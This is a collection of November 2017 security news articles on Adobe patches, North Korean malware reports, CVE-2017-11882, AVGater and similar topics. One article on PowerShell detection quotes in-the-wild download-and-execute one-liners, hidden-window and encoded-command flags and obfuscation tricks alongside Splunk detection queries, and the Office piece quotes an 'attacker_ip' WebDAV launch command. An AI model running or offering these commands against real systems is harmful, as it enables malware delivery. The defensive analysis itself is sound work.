"setprop persist.sys.adb.engineermode 0" and "setprop persist.sys.adbroot 0" or call code *#8011#
Elliot Alderson plans to release an application to root the OnePlus devices.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 18 others
Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root an @Oneplus device with a simple intent pic.twitter.com/gN0awYijBv

Elliot Alderson @fs0c131y
I will publish an application on the PlayStore to root your @OnePlus device in the next hours

10:57 PM - Nov 13, 2017
22 22 Replies 27 27 Retweets 154 154 likes
Twitter Ads info and privacy
OnePlus company is currently analyzing the issue.

Stay tuned!


Adobe Patch Tuesday addresses 80 flaws, 56 bugs in Reader and Acrobat
15.11.2017 securityaffairs Vulnerebility

Adobe released today’s Patch Tuesday, a total of 80 vulnerabilities across 9 products, most of which for Acrobat and Reader, including dozens of RCE issues.
Adobe released patches for a total of 80 vulnerabilities across its products, including Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

Half of the vulnerabilities addressed with the last Adobe Patch Tuesday were discovered by experts of the Chinese firm Tencent.

The highest number of flaw (56) has been fixed in Acrobat and Reader for Windows and Mac. The patches addressed many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

Adobe Patch Tuesday

Adobe fixed five remote code execution by releasing updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player.

The company also fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) vulnerabilities in Adobe Connect, Adobe also implemented a feature to mitigate clickjacking attacks.

Adobe fixed some critical code execution issues affecting Windows and Mac versions of Photoshop CC, and Shockwave Player for Windows, the company also solved a critical memory corruption vulnerability in DNG Converter for Windows.

Adobe addressed six flaws in Digital Editions for Windows, Mac, iOS, and Android that can lead to the disclosure of memory addresses and other sensitive data.

Adobe fixed three vulnerabilities in Experience Manager, including one information disclosure bug rated moderate severity, the firm also addressed a critical remote code execution bug in Adobe InDesign.

According to Adobe, none of the vulnerabilities patched are under active attack


Go to HELL, PowersHELL : Powerdown the PowerShell Attacks
15.11.2017 securityaffairs Attack

Powerdown the PowerShell Attacks : Harnessing the power of logs to monitor the PowerShell activities
Lately, I have been working on analyzing the PowerShell attacks in my clients’ environment. Based on the analysis and research, I have come up with a few indicators that will help to detect the potential PowerShell attacks in your environment using windows event logs. First, we will understand how PowerShell is weaponized in the attacks that are observed in the wild and then we will look at the detection mechanism.

How PowerShell is used in the attacks
As all of us are aware that PowerShell is extremely powerful and we have seen that attackers are increasingly using PowerShell in their attack methods lately. PowerShell is a default package that comes with Microsoft Windows OS and hence it is readily available on the victim machines to exploit.

“Powershell is Predominantly used as a downloader”

The most prominent use of PowerShell, that is observed in the attacks in-the-wild, is to download the malicious file from the remote locations to the victim machine and execute it using commands like Start-Porcess, Invoke-Item OR Invoke-Expression (-IEX) file OR downloading the content of the remote file directly in to the memory of the victim machine and execute it from there.

Two methods of System.net.Webclient that are prevalent in the live attacks

− (New-object System.net.webclient).DownlodFile()
− (New-object System.net.Webclient).DownloadString()
(New-object System.net.webclient).DownlodFile()

The simplest example of this method to check how it works is shown in the snapshot below. (an experiment that one can perform to check the functionality of this method by setting up a http/s server using program like Xampp )


In the example shown above, the file is downloaded to the disk as evilfile.txt at the path C:\Users\kirtar_oza\AppData\Roaming set by calling the environment variable $Appdata and then this file is executed using “Invoke-Item” command.

Following is an example from one of the attacks in the wild

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://**********.com/***/**.dat', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe
In above example, the remote file is downloaded using .downloadfile() method and dropped under users’ appdata directory using environment variable and “Start-Process” is used to execute the dropped binary.

The following are some more examples of the PowerShell downloads and invocation that have been seen in the wild

C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:vlbjkf
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:imumnj
C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bdabgf([String] $hcre){(New-Object System.Net.WebClient).DownloadFile($hcre,''C:\Users\***\AppData\Local\Temp\****.exe'');Start-Process ''C:\Users\****\AppData\Local\Temp\****.exe'';}try{Bdabgf(''http://*****.com/****.png'')}catch{Bdabgf(''http://*****.de/***.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\****\AppData\Local\Temp\*****.bat;Start-Process 'C:\Users\*****\AppData\Local\Temp\******.bat' -WindowStyle Hidden"
(New-object System.net.Webclient).DownloadString()

DownloadString() does not download any file to the disk but it copies the content of the remote file directly to the memory of the victim machine. These files typically are malicious scripts which get executed directly into the memory using Powershell –Command argument. This technique is wildly used to create so-called file-less malware where the evil script is executed directly in the memory of the victim machine without dropping any file as such on the hard disk. This technique is used to bypass signature-based detection.

The simplest example of this method to check how it works is as below

Powershell attacks

Where cmd.js is a remote script that starts calc.exe process on the victim machine without any file on the disk – runs from memory. [ Note : just write calc.exe in a notepad file and save it as .js extension]

The following snippet is from one of the attacks in the wild

powershell -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('hxxp://******** [.]com/***/**.mdf', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe';(New-Object System.Net.WebClient).DownloadString('hxxp://nv******[.]com/s.php?id=po**')
In above example, both of the methods have been used together – downloadstring() is used to download some php code from the remote host.

PowerShell “Flags” to make operation stealth
Attackers use a variety of options available in PowerShell to keep their operation as stealthy as possible. Following are the flags which are widely used in the attacks – and that could be used to build our list of Indicators of Compromise (IOC)

–WindowStyle hidden / -w hidden: to make PowerShell operation stealth by making program window hidden from user

–Exec Bypass: to bypass/ignore the execution policy like Restricted which restricts the PowerShell scripts from running

– Command / -c : to execute any commands from PowerShell terminal

–EncodedCommand / -e / -Enc: to pass encoded parameters as command lines

–Nop / -Noprofile : to ignore the commands in the Profile file

Examples of the various flags

You can refer the example in the previous section to understand the use of flags – -nop -Exec Bypass –Command

The following are the examples of various flags used by the attackers in the wild

C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://****.com/Updates')
PowersHell –e <encoded input>
Powershell – Enc <encoded input>
Indicators of Compromise
Now, I will talk about the indicators of compromise that helps u to detect any suspicious PowerShell activities in the environment.

Observe the Parent-Child Relationship for the PowerShell Process
Typically, when we run PowerShell using windows start menu or from its location on the disk, it starts under explorer.exe – you can see parent-child relationship tree using Process Explorer OR Process Hacker on your system.

Powershell attacks

Powershell attacksIt looks like as shown in left – Explorere.exe is the parent process to the Powershell.exe

Most of the times, in PowerShell attacks, PowerShell script / commands launched through command line process – therefore, we usually have observed that the parent process to the Powershell Process is cmd.exe in the attacks which are in the wild.

Powershell attacks

Powershell attacksNow, there are legit cases also where cmd.exe will be the parent process for PowerShell process – like administrator wants to fire some PowerShell script and he launches powershell form command prompt (cmd.exe)

“Therefore, it is important to have a look at the Grandparent process as well like – who spawned the cmd.exe – that will give you an indication if this could be part of the attack.”

So, if the Grandparent process is winword.exe, mshta.exe, wscript.exe, wuapp.exe – then it is a fair indication that cmd.exe is spawned by a script and that script is worth to look at.

“There are cases where we have observed PowerShell Process is directly spawned by windword.exe – that is a clear indication of a suspicious activity that we need to log and investigate.”

This kind of behavior typically seen in Phishing cases where user clicked/opened the word document which has embedded macro (vbscript) in it which spawns the PowerShell process to download the malicious content from the web.

Therefore, log and pay attention to the PowerShell process if

-It is spawned by winword.exe ( its parent process is winword.exe)

-It is spawned by cmd.exe (its parent process is cmd.exe) and if cmd.exe is spawned by

winword.exe (Grandparent of PowerShell is winword.exe)

mshta.exe

wscript.exe

wuapp.exe

tasking.exe

-It is spawned by any of the above processes (Its Parent is any of above process – mshta,wscript, cscript, wuapp, tasking etc. )

Have a look at the following snippet from Process Monitor that shows Process Creation order after the sample script is executed – PowerShell is executed by Wscript.exe – that means Wscript.exe is a parent process for PowerShell and PowerShell is in-turn the Parent process for conshost.exe which spawns the calc.exe.

Powershell attacks

Sample Script is as below – copy these 2 lines of code in Notepad and save it as .js and run it

shell = new ActiveXObject('WScript.Shell');
shell .Run("powershell.exe Invoke-Item c:\\windows\\system32\\calc.exe");
The indicators discussed above are indicative and by no means, it is a comprehensive set of relationships but this can be a good starting point form where we can start logging PowerShell execution in the environment and then focus on above IOCs to investigate them further for any suspicious activity.

Command-lines are king
Many of the Powershell attacks can be detected by just monitoring command line parameters passed along with the PowerShell process. Moreover, it will help us to further investigate the incident by providing the cues on where to look next for further evidence. For example, if downlodFile() method is used – we will come to know the location on the hard disk where the malicious file might have dropped and the malicious site from where the malicious file is downloaded. We can take these clues and investigate further to assess the impact and behavior of the attack.

How can windows security eventlogs help us in detecting the PowerShell attacks?
There are multiple ways to enable logging for PowerShell based on the version of the PowerShell and operating system used.

Today, I am going to talk about the windows event code that will help us to identify the IOCs described above. By just enabling and logging this event id, it is possible to effectively detect the PowerShell attacks.

I am talking about windows security event id 4688 – Process Creation. Yes, it will generate hell lot of events but applying basic filtering techniques, we can log and monitor only the logs of interest. By default, Process Creation audit is disabled – so first and foremost, we need to enable this feature using GPO. You can read more on this here.

In addition to that – it is important to log command line parameters which are passed at the time of process creation. Command line auditing feature is made available on Microsoft starting from Windows 8.1 and Windows Server 2012 R2. We just need to enable this feature by enabling Include command line in process creation events at Administrative Templates\System\Audit Process Creation and you can roll this out using GPO. You can read more on this here.

Microsoft has come up with the update to make this feature available on its other supported versions of Windows 7, Server 2008 and Server 2008 R2. You can read more on this here and here.

Event ID 4688 will give us two key information based on which alerts can be created on the SIEM to detect such attacks.

Which process has been created
What Command line parameters/arguments are passed with the process creation (if any)
Who is the parent process (Win10/ Win 16 and later includes name of the parent process under Creator_Porcess_Name field; previous versions of windows include the Process ID of the parent process under Creator_Process_ID)
I would take an example of Splunk and explain how alerts can be created to detect the suspicious PowerShell activities in your environment. I will also mention caveats associated with the alert.

First of all, we are interested in capturing Powershell attacks so we need to monitor the events where Powershell.exe is created or spawned. Typicall, 4688 Event ID looks like following – that includes the field called “New_Process_Name” – that gives information about which process is created.

Powershell attacks

So, we need to pick-up those events by following search

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Next step is to review the command line arguments passed with Powershell Process initiation.

Process_Command_Line gives information about the command line parameters that are passed to the newly created process – i.e. Powershell. We can create the alert based on the frequently used parameters like –e, -Encod, -windowstyle , Bypass , -c , -command etc.

index=win_sec EventCode=4688 New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe –c OR –Encode OR -e, OR – windowstyle
Better option is to create the input lookup list for the known suspicious command line arguments and lookup against that in your alert.

Starting with Windows 10 and Windows Server 2016 – Microsoft has added a field called “Creator Process Name” in Event Id 4688 which gives the name of the Parent Process. This filed helps to create the alerts based on the suspicious parents.

index=win_sec EventCode=4688
New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Creator_Process_Name= C:\Program Files\Microsoft Office\Office15\winword.exe
New_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Creator_Process_Name= C:\windows\system32\mshta.exeNew_Process_Name="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Creator_Process_Name= C:\windows\system32\cmd.exe
Caveat:
“Unfortunately, PowerShell commands / scripts are easy to obfuscate.”

There are many ways by which the PowerShell scripts can be obfuscated. Random variables or string concatenation can be introduced in the PowerShell that can easily fool static comparison between command lines with the input lookup (as shown above). The following are few obfuscation methods that can render our static comparison ineffective.

Three is an excellent research article on PowerShell Attack Methods by Symantec THE INCREASED USE OF POWERSHELL IN ATTACKS which includes excellent examples of obfuscation taken from a Derbycon 2016 talk by Daniel Bohannon on Powershell obfuscation. Following are a few examples of obfuscation, out of many discussed in this paper

Mixed upper and lower case letters can be used, as commands are not case sensitive.
Example: (neW-oBjEct system.NeT.WeBclieNT). dOWNloadfiLe

Strings can be concatenated, including from variables, allowing for single or double quotes.
Example: (New-Object Net.WebClient). DownloadString(“ht”+’tp://’+$url)

With the exception of the 14 special cases, the escape character ` can be used in front of a character with no change in the result. A similar trick can be used with the escape character ^ when starting PowerShell from cmd.exe.
Example: (new-object net. webclient).”d`o`wnl`oa`dstr`in`g”($url)

Some arguments can be replaced with their numerical representation.
Example: “-window 1” instead of “-window hidden”

However, it is important to monitor the PowerShell execution in your environment and if the command lines are obfuscated, the chances are very high that it is run as a part of the cyber-attack. Hence, it is imperative to log Event ID 4688 – you may apply filter to log only PowerShell process creation and monitor the command line arguments passed with each PowerShell process creation.

So till next time – KEEP CALM and STAY VIGILANT !!!


US DHS and FBI share reports on FALLCHILL and Volgmer malware used by North Korean Hidden Cobra APT
15.11.2017 securityaffairs BigBrothers

US DHS published the details of the malware FALLCHILL and Volgmer used by the APT group Hidden Cobra that is linked to the North Korean government.
The US Department of Homeland Security (DHS) published the details of the hacking tool FALLCHILL used one of the APT group linked to the North Korean government tracked as Hidden Cobra (aka Lazarus Group).

The activity of the Lazarus Group surged in 2014 and 2015, its members used mostly custom-tailored malware in their attacks and experts that investigated on the crew consider it highly sophisticated.

This threat actor has been active since at least 2009, possibly as early as 2007, and it was involved in both cyber espionage campaigns and sabotage activities aimed to destroy data and disrupt systems. Security researchers discovered that North Korean Lazarus APT group was behind recent attacks on banks, including the Bangladesh cyber heist.

According to security experts, the group was behind, other large-scale cyber espionage campaigns against targets worldwide, including the Troy Operation, the DarkSeoul Operation, and the Sony Picture hack.

In June, the United States Computer Emergency Readiness Team (US-CERT) issued a technical alert about the activity of the North Korea’s ‘Hidden Cobra’ APT group.

Many experts believe the WannaCry ransomware was developed by the Lazarus Group due to similarities in the attack codes. UK Government also linked the WannaCry attack that crippled NHS to North Korea.

The DHS and FBI issued a joint alert that reveals a remote administration tool (RAT) known as FALLCHILL was used by the North Korean hackers to target companies in the aerospace, finance, and telecommunications sectors.

“Working with U.S. government partners, DHS and FBI identified Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a remote administration tool (RAT) used by the North Korean government—commonly known as FALLCHILL.” states the report.

“According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. “

The US experts identified 83 network nodes in the FALLCHILL infrastructure, including countries in which the infected IP addresses are registered.

The report includes a list of indicators of compromise (IOCs), Network Signatures associated with the threat and Yara rules for its detection.

north korea

The US DHS also published a separate report on another threat, the Volgmer Trojan used by the North Korean government. The Volgmer is a backdoor Trojan “designed to provide covert access to a compromised system,” it has been used since 2013.

“Volgmer is a backdoor Trojan designed to provide covert access to a compromised system. Since at least 2013, HIDDEN COBRA actors have been observed using Volgmer malware in the wild to target the government, financial, automotive, and media industries.” states the report.

“It is suspected that spear phishing is the primary delivery mechanism for Volgmer infections; however, HIDDEN COBRA actors use a suite of custom tools, some of which could also be used to initially compromise a system. Therefore, it is possible that additional HIDDEN COBRA malware may be present on network infrastructure compromised with Volgmer”

This second report also includes details of the infrastructure associated with the malware and IoCs.

The DHS tracked at least 94 static IP addresses along with dynamic IP addresses registered across various countries, most of them in India (772 IPs – 25.4 percent), Iran (373 IPs – 12.3 percent), and Pakistan (343 IPs – 11.3 percent).

The Volgmer malware was used by Pyongyang in attacks against the government, financial, automotive, and media industries since at least 2013, The threat was delivered via spear-phishing emails.

The DHS warned of the Hidden Cobra availability of a suite of custom tools that the North Korean hackers used to hack into the companies.


17-Year-Old MS Office flaw CVE-2017-11882 could be exploited to remotely install malware without victim interaction
15.11.2017 securityaffairs Vulnerebility

Ops, a 17-Year-Old flaw in MS Office, tracked as CVE-2017-11882, could be exploited by remote attackers to install a malware without user interaction.
Ops, a 17-Year-Old vulnerability in MS Office could be exploited by remote attackers to install a malware without user interaction.
The flaw is a memory-corruption issue that affects all versions of Microsoft Office released in the past 17 years, including the latest Microsoft Office 365. The vulnerability could be triggered on all versions of Windows operating system, including the latest Microsoft Windows 10 Creators Update.

The vulnerability, tracked as CVE-2017-11882, was discovered by the security researchers at Embedi, it affects the MS Office component EQNEDT32.EXE that is responsible for insertion and editing of equations (OLE objects) in documents.

The component fails to properly handle objects in the memory, a bug that could be exploited by the attacker to execute malicious code in the context of the logged-in user.

The EQNEDT32.EXE component was introduced in Microsoft Office 2000 seventeen years ago and affects Microsoft Office 2007 and later because the component was maintained to maintain the backward compatibility.

CVE-2017-11882

To exploit the vulnerability, an attacker needs to trick victims into opening a specially crafted malicious file with an affected version of Microsoft Office or Microsoft WordPad software.
The attacker can gain full control on the target system by chaining the vulnerability with Windows Kernel privilege escalation exploits like CVE-2017-11847.

Researcher at Embedi researchers described several attack scenarios :

“By inserting several OLEs that exploited the described vulnerability, it was possible to execute an arbitrary sequence of commands (e.g., to download an arbitrary file from the Internet and execute it).” states the analysis published by Embedi.

“One of the easiest ways to execute arbitrary code is to launch an executable file from the WebDAV server controlled by an attacker.”

“Nonetheless, an attacker can use the described vulnerability to execute the commands like cmd.exe /c start \\attacker_ip\ff. Such a command can be used as a part of an exploit and triggers starting WebClient.”

“After that an attacker can start an executable file from the WebDAV server by using the \\attacker_ip\ff\1.exe command. The starting mechanism of an executable file is similar to that of the \\live.sysinternals.com\tools service.”

Microsoft has addressed the vulnerability with the November Patch Tuesday release, the tech giant has changed the way the affected component handles objects in memory.

The experts warn of the presence of many security issued in this vulnerable Office component and suggest disabling it to avoid problems.

To disable the component it is very simple, just type the following command in the command prompt:

reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

For 32-bit Microsoft Office package in x64 OS, the command to run is:

reg add “HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046}” /v “Compatibility Flags” /t REG_DWORD /d 0x400

Microsoft users should also enable Protected View to prevent active content execution (OLE/ActiveX/Macro).


Windows Defender Immune to AVGater Quarantine Flaw: Microsoft
14.11.2017 securityweek Virus

A recently disclosed vulnerability that allows an attacker to abuse the quarantine feature of anti-virus products to escalate privileges doesn’t affect Windows Defender, Microsoft says.

Dubbed AVGater, the new attack method relies on a malicious DLL being quarantined by an anti-virus product and then abuses the security program’s Windows process to restore the file.

Because the anti-virus process typically has System permissions, the malicious file is written to a different location (such as the Program Files or Windows folders) than its initial folder, so it could run with higher privileges.

This is possible because of a type of file link called junction, which allows for the writing of the restored file anywhere on the hard drive on NTFS file systems. Now written to a folder from which a privileged Windows process is launched, the malicious DLL is executed first, due to how the operating system works.

“To exploit this vulnerability, malicious applications, including those launched by user-level accounts without administrator privileges, create an NTFS junction from the %System% folder to folder where the quarantined file is located. This NTFS junction can trigger the antivirus product to attempt to restore the file into the %System% folder,” Microsoft explains.

Discovered by Florian Bogner, information security auditor at Austria-based Kapsch, the bug was said to affect products from a large number of anti-virus makers. However, only Trend Micro, Emsisoft, Kaspersky Lab, Malwarebytes, Check Point (ZoneAlarm) and Ikarus were named, as they have already patched the issue.

In a blog post, Microsoft underlines the fact that Windows Defender is not affected by the AVGater flaw, which requires a non-administrator-level account to perform a restore of a quarantined file.

According to Microsoft, the vulnerability represents a relatively old attack vector, but “Windows Defender Antivirus has never been affected by this vulnerability because it does not permit applications launched by user-level accounts to restore files from quarantine.”

The tech giant explains that this design feature was meant as a built-in protection and that the security application includes similar safety measures against other known user-account permissions vulnerabilities as well.


Medigate Emerges From Stealth With Medical Device Firewall
14.11.2017 securityweek Safety

Israel-based startup Medigate emerged from stealth mode on Tuesday with a firewall designed specifically for protecting medical devices, and more than $5 million in seed funding.

Healthcare organizations have been increasingly targeted in the past few years, including in ransomware attacks and operations whose goal was to obtain sensitive medical information. Experts have often also warned about the possibility of attacks aimed at disrupting medical treatment.

While medical devices are increasingly connected, protecting them against cyber threats requires a different approach compared to common IT systems. Applying software patches and installing traditional endpoint security solutions on medical systems can cause disruptions, which is why these devices often remain vulnerable and serve as key pivot points within the targeted organization’s network, as shown by the MEDJACK attacks.

Medigate aims to address this problem with a dedicated platform for securing medical devices that are connected to electronic medical records, device servers, other enterprise systems, and even the Internet.

Using knowledge of the medical workflow, Medigate’s firewall solution provides complete visibility into all devices on the network and allows organizations to quickly identify anomalies and suspicious activity. In addition to detecting threats, the product also blocks malicious communications to prevent any damage, Medigate said.

The firewall sits between the medical devices and the servers they communicate with in an effort to prevent attackers from taking control of this part of the network.

Medigate

“Because it is not possible to effectively deploy endpoint security solutions and regular security patches to these devices, they significantly increase the exposure in my organization’s overall risk posture,” said Heath Renfrow, U.S. Army Medicine CISO. “A product like Medigate would add a much necessary layer of defense, significantly reducing the risk of medical device vulnerabilities to my networks.”

Medigate’s solution is currently available to a limited number of qualified organizations, but it’s expected to become generally available in mid-2018.

Medigate has raised $5.35 million in a seed funding round led by YL Ventures, a seed-stage venture capital firm that invests in Israeli innovations, with participation from early-stage VC company Blumberg Capital.


The Disconnect Between Security Perception and Security Reality
14.11.2017 securityweek Security
A new global survey highlights the disconnect between security expectations and security reality for many IT/security professionals.

There is an awareness of the likelihood of security attacks (45% of respondents expect one within the next 12 months). There is ongoing empirical evidence of the failure of security professionals to stop these attacks -- most recently with Equifax. Despite this, 89% of survey respondent believe they are in a good position to protect themselves from attack.

The survey report (PDF), 'Security Practices and Expectations Following the World's Biggest Breach' (Equifax) was published on Monday by Varonis. Five hundred IT and security professionals with personal responsibility for security were questioned between September 28 - October 6, 2017. Two hundred are located in the U.S., with 100 in each of the UK, France and Germany. All work for companies with more than 1,000 employees from within a variety of different vertical industry sectors.

SecurityWeek asked Matt Lock, director of sales engineers at Varonis, why there should be this difference between expectation and reality. One often-quoted possibility is the Optimism Bias (Wikipedia) -- the hard-coded biological instinct that bad things happen to other people, not to me.

Lock doesn't feel that the survey sheds any light on the reasons for the disconnect, merely that it exists. From a personal stand-point he points to over-confidence and possibly a lack of visibility into their own networks. On the former, he commented, "Some really do feel they are completely prepared and have figured out how to keep their organizations safe. In 2017, many well-respected organizations, which would seem to have the resources to ward off cyberattacks, fell victim to breaches and ransomware. Was over-confidence to blame?"

For the latter, he wonders if track-record might be a contributing factor: professionals who don't believe they have been breached might believe "that what they're doing must be working. The reality, however, might be that they have been breached but just don't know it."

Nevertheless, despite the confidence in their ability to resist future attacks, around 25% of the respondents confirmed that their organization had experienced data loss, data theft or ransomware during the last two years. This was highest in Germany, where 34% of respondents reported that their organization had been a victim of ransomware.

The perceived ability to resist attacks is not the only surprising detail to come from the survey. Given the relative imminence of GDPR next year, and the common perception that many companies are still not GDPR-compliant, it would be unsurprising to see 'compliance' as an issue of concern.

This is not shown in practice. In the US, compliance ranks only third in concerns for 2018 (behind data theft and data loss). In the UK it ranks fifth, behind the extra concerns for ransomware and cloud issues, while in neither France nor Germany does it rank anywhere in the top five concerns for next year.

"One possible explanation," Lock told SecurityWeek, "is that the U.S. is reacting more strongly towards GDPR because there hasn't been a regulation quite as stringent in place save for a few highly regulated industries. The attitude in UK, France, and Germany may be that GDPR is just a new spin on the current EU Data Protection Directive (DPD)."

However, he suggests this might change once GDPR starts to be enforced. One possibility is that organizations believe that 2018 will be a bedding-in period for the regulations, and they won't be enforced before 2019. He also suggests that top-of-mind for security professionals could be their most recent fire-fight. "In many ways," he suggested, "security professionals are fighting the last fight; they may be focusing their attention on ransomware and wipers, rather than looking ahead to the GDPR."

A further surprising detail comes in the rate of cyberattack experience. A common perception is that the U.S. experiences more attacks than Europe. There are two reasons -- firstly, it is simply a fact because of the degree of IT reliance in North American business; and secondly, the more stringent breach notification laws current in America make breach reporting more common than in Europe; that is, Europe doesn't report all of the attacks it experiences.

However, this perception is reversed by the survey respondents. Twenty-three percent of U.S. organizations have experienced the loss or theft of company data over the last few years; but this figure rises to 29% in Europe.

"The results are surprising," comments Lock; "and this survey gives us a peek behind the curtain. The figures in the survey suggest there's no correlation, and that organizations are being hit in greater numbers than we previously thought -- possibly they are simply keeping that information to themselves to avoid negative publicity. We may see a notable increase in reported attacks once GDPR kicks in. The results suggest the problem could be much worse than we realize."


Cloudflare Acquires Mobile App Specialist Neumob
14.11.2017 securityweek Mobil

Website performance optimization and security firm Cloudflare has expanded its reach to mobile with the acquisition of Neumob. The agreement brings Cloudflare's global optimization network to mobile apps built with the Neumob SDK. Financial details were not disclosed.

Sunnyvale, Calif.-based Neumob is a firm predicated on improving the performance of mobile computing. Poorly designed apps and the inherent latency of mobile computing mean that one of the most dynamic areas of the internet is also the slowest. Neumob addresses this issue with an SDK aimed at app developers. Its unique selling point is that even slight improvements in internet performance increase user retention and customer conversion.

The Neumob SDK improves load times and in-app performance by 30% to 300%, and reduces app errors and timeouts by up to 90%. It also significantly reduces bandwidth usage and data fees. "We have a purpose-built solution for the first, middle and last miles traveled in every session," explains the company on its website. The Neumob SDK is the world's first end-to-end accelerator for app owners and developers. It provides a mobile app with instant access to acceleration and error reduction features at all stages of the mobile delivery process -- the first mile, middle mile and last (mobile) mile."

The weakness is the 'middle mile' -- the internet itself. Neumob has sought to remedy this with the development of its own network of points of presence (POPs) -- 164 in 95 metropolitan areas across 6 continents. It's a start, but hardly a global network.

Cloudflare has that global network: 118 data centers in 58 countries with more than 7 million domains that already routes 10% of all HTTP/HTTPS Internet traffic. It also has the technology to move data across the internet with optimum performance. Argo, for example, analyzes the performance of network paths to route traffic across the fastest available paths. It maintains open secure communications and eliminates the latency of connection setup.

The combination of Neumob and Cloudflare will benefit both parties. "We've long needed a global network running at the edge to fully realize the technology we've created at Neumob," said Jeff Kim, co-founder of Neumob. "Now that we're a part of the Cloudflare team, we have a tremendous opportunity to engage with Cloudflare's customers and improve the mobile experience for users around the world."

"Cloudflare's mission is to help build a better Internet -- we mean that literally," said Matthew Prince, co-founder and CEO of Cloudflare. "With Neumob, we're now able to reach the last-mile of connectivity and provide the fastest and most secure experience possible for users everywhere, on any device."

Neumob was founded in 2015. It raised $10.9 in the same year -- $2.3 million in seed funding followed by $8.5 million in a Series A round led by Accel Partners.

San Francisco, CA-based Cloudflare was founded in 2009. It has raised a total funding amount of $182,050,000 -- the most recent being $110 million Series D funding led by Fidelity Investments in September 2015. It routes traffic through its own global network, blocking DoS attacks, reducing spam and improving performance.

Earlier this year, Cloudflare collaborated with Flashpoint, Akamai and RiskIQ in a cross-vendor project to neutralize the newly emerging WireX botnet.


Freedom of the Net report – Manipulating Social Media, hacking election and much more
14.11.2017 securityweek BigBrothers

Freedom of the Net report – Online manipulation played a crucial role in elections in at least 18 countries over the past year, including the United States.
While cyber security experts still debate cyber attacks against 2016 Presidential Election, according to the independent watchdog Freedom House at least 18 countries had their elections hacked last year.

The group surveyed 65 nation states comprising 87 percent of internet users and observed that in at least 18 cases, foreign governments or outside bodies had tried to influence an election by restricting or interfering with internet use.

According to the organization, Governments around the world are dramatically increasing their efforts to manipulate information on social media, threatening the notion of the internet as a liberating technology, this is the message emerged from annual Freedom of the Net report.

“The use of paid commentators and political bots to spread government propaganda was pioneered by China and Russia but has now gone global,” said Michael Abramowitz, president of Freedom House. “The effects of these rapidly spreading techniques on democracy and civic activism are potentially devastating.”

While in some cases the interference attempts were performed by foreign actors, in the majority of the cases they were carried out either by the local government or opposition. The watchdog reported that 30 countries have now been found to be running armies of trolls to try and influence public sentiments on specific topics.

“Venezuela, the Philippines, and Turkey were among 30 countries where governments were found to employ armies of “opinion shapers” to spread government views, drive particular agendas, and counter government critics on social media.” states the report. “The number of governments attempting to control online discussions in this manner has risen each year since Freedom House began systematically tracking the phenomenon in 2009.”

Chined Government is the most active in this sense, it used a cyber army composed of bloggers and social media users who support its politics and discredit political opponents. Unfortunately, China isn’t the only one, in Russia, the Internet Research Agency is the “troll farm” reportedly financed by a businessman with close ties to President Vladimir Putin.

Unlike other methods of censorship, the online content manipulation is very difficult to detect and combat, the countering content manipulation takes time and resources.

“Not only is this manipulation difficult to detect, it is more difficult to combat than other types of censorship, such as website blocking, because it’s dispersed and because of the sheer number of people and bots deployed to do it,” said Sanja Kelly, director of the Freedom on the Net project. “The fabrication of grassroots support for government policies on social media creates a closed loop in which the regime essentially endorses itself, leaving independent groups and ordinary citizens on the outside.”

Freedom of the Net report

Giving a look at other data in the report, Freedom House classified only 23 percent of the internet as “free.”

Freedom of the Net Freedom House image

14 countries this year passed laws to restrict the internet use, in some cases, Governments banned the use of VPNs, 19 countries have used some kind of internet shutdown during political events.

The report also warns of physical attacks on netizens and online journalists spread globally, in 8 countries (including Brazil, Mexico, Pakistan, and Syria) journalists or online commentators have been killed for their online activities.

According to the Freedom of the Net report the things will get worse in the future.


IcedID, a new sophisticated banking Trojan doesn’t borrow code from other banking malware
14.11.2017 securityweek Virus

Researchers at IBM have spotted a new banking malware dubbed IcedID has capabilities similar to other financial threats like Gozi, Zeus, and Dridex.
Malware researchers at IBM X-Force have spotted a new strain of banking malware dubbed IcedID has capabilities similar to other financial threats like Gozi, Zeus, and Dridex. IcedID does not borrow code from other banking malware, but it implements comparable features.
“Overall, this is similar to other banking Trojans, but that’s also where I see the problem,” says Limor Kessem, executive security advisor for IBM Security.

The banking Trojan was first observed in September in campaigns aimed at banks, payment card providers, mobile service providers, payroll, Webmail, and e-commerce sites in the United States and Canada.

The malware also targeted two major banks in the United Kingdom.

The experts highlighted the distribution technique adopted by IcedID that leverages on the Emotet Trojan. Emotet is delivered via spam emails, usually disguised in productivity files containing malicious macros, and remains stealth to be used by operators to distribute other payloads, such as IcedID.

